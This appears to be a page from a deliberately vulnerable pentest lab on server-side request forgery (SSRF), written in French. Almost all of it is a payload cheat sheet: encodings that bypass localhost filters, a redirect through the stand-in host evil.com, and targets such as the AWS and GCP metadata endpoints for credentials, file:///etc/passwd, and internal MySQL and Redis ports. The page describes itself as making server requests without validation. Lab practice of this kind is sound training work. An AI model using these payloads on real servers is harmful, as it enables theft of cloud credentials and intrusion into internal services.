SSRF - Pentest Lab

URL encoding: http://127.0.0.1 → http://%31%32%37%2e%30%2e%30%2e%31
Decimal IP: http://2130706433 (= 127.0.0.1)
Octal IP: http://0177.0.0.1
IPv6: http://[::ffff:127.0.0.1]
DNS rebinding: Utiliser un domaine qui resout vers 127.0.0.1
Redirect: http://evil.com/redirect?url=http://localhost

SSRF (Server-Side Request Forgery)

Cette page permet de faire des requetes HTTP depuis le serveur sans validation.

Target	URL	Description
Localhost	`http://127.0.0.1:80`	Serveur web local
Loopback IPv6	`http://[::1]`	Contournement de filtre
AWS Metadata	`http://169.254.169.254/latest/meta-data/`	Credentials AWS
GCP Metadata	`http://metadata.google.internal/`	Credentials GCP
File system	`file:///etc/passwd`	Lecture de fichiers locaux
Internal service	`http://localhost:3306`	Base de donnees MySQL
Redis	`http://localhost:6379`	Cache Redis